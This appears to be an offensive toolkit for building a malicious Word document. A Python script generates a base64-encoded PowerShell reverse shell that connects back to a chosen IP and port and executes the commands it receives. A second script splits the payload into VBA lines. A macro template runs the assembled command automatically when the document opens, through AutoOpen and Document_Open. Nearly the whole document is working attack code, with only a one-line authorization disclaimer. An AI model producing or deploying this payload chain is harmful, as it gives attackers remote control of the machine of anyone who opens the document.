ps_gen.py
import sys
import base64
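def help():
    """Print the usage text to stderr and exit with status 1.

    The original wrote usage to stdout and exited with status 0, so a
    caller that captured stdout (e.g. piping the generated command line
    into another tool) would silently receive the usage text in place of
    a payload. Usage now goes to stderr and the exit status is non-zero.
    The name shadows the builtin help(); it is kept because the argument
    parser below calls it by this name.
    """
    print("USAGE: %s IP PORT" % sys.argv[0], file=sys.stderr)
    print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT", file=sys.stderr)
    sys.exit(1)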
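# Parse the two positional arguments. A missing argument (IndexError) or a
# non-numeric port (ValueError) is a usage error; the original bare
# `except:` would also have swallowed KeyboardInterrupt and SystemExit.
try:
    ip, port = sys.argv[1], int(sys.argv[2])
except (IndexError, ValueError):
    help()  # does not return
# Reject a port that can never be connected to before it is baked into the
# payload; "%d" formatting alone would accept any integer.
if not 0 < port < 65536:
    help()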
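# PowerShell TCP reverse-shell one-liner: connects to IP:PORT, reads a
# command, runs it with iex, and writes stdout/stderr plus a "PS <cwd>> "
# prompt back over the socket until the stream closes. The "%%" is a
# literal "%" once the %-formatting below has run.
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (ip, port)
# `powershell -e` (-EncodedCommand) expects base64 of the script's UTF-16LE
# bytes with no BOM. The 'utf-16le' codec produces exactly that on every
# host; the original .encode('utf16')[2:] relied on the machine's native
# byte order being little-endian and on the codec emitting a 2-byte BOM.
cmdline = "powershell -e " + base64.b64encode(payload.encode("utf-16le")).decode()
print(cmdline)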
Copy the printed command line, paste only its base64 part (the text after `powershell -e `) into the placeholder string at the top of the following script, and run it; it splits the long encoded string into VBA-sized concatenation lines.
vba_formatter.py
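# Paste ONLY the base64 part printed by ps_gen.py (the text after
# "powershell -e ") into the placeholder below. The original used `str` as
# the variable name, which shadows the builtin.
cmdline = "powershell -e [paste the encoded string]"
# Characters per generated VBA line. Each chunk becomes its own statement,
# so VBA's line-length and line-continuation limits are never reached.
n = 50


def _vba_lines(text, width):
    """Split *text* into VBA statements that rebuild it by concatenation.

    Returns one 'Str = Str + "<chunk>"' line per *width* characters (the
    last chunk may be shorter). The variable is spelled exactly as in the
    macro template ("Str = Str + ...") so the output pastes in unchanged;
    the original emitted 'Str = str+' which only works because VBA is
    case-insensitive. No quoting is needed: the base64 alphabet contains
    no double quote. Raises ValueError if *width* is < 1 (range() would
    otherwise fail with a step of 0 or loop nothing).
    """
    if width < 1:
        raise ValueError("width must be >= 1")
    return ['Str = Str + "' + text[i:i + width] + '"' for i in range(0, len(text), width)]


for line in _vba_lines(cmdline, n):
    print(line)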
The VBA macro template to use. Both AutoOpen and Document_Open call MyMacro so the payload runs on open whichever entry point Word fires; replace the two sample `Str = Str + ...` lines with the full output of vba_formatter.py. Use only against systems you are authorized to test.
Sub AutoOpen()
    ' Auto macro entry point: hand off to the shared MyMacro body.
    Call MyMacro
End Sub
Sub Document_Open()
    ' Document event entry point: same payload as AutoOpen.
    Call MyMacro
End Sub
Sub MyMacro()
    ' Rebuilds the command line produced by ps_gen.py from the
    ' "Str = Str + ..." fragments emitted by vba_formatter.py, then runs it.
    ' NOTE(review): Str is also the name of a VBA built-in function; the
    ' local variable appears to take precedence here, but a distinct name
    ' (changed in vba_formatter.py as well) would remove the ambiguity.
    Dim Str As String
    Str = Str + "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAt"
    Str = Str + "AE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAF"
    .
    .
    .
    ' (the dots stand for the remaining generated fragments)
    ' Execute the assembled command line via WScript.Shell.
    CreateObject("Wscript.Shell").Run Str
End Sub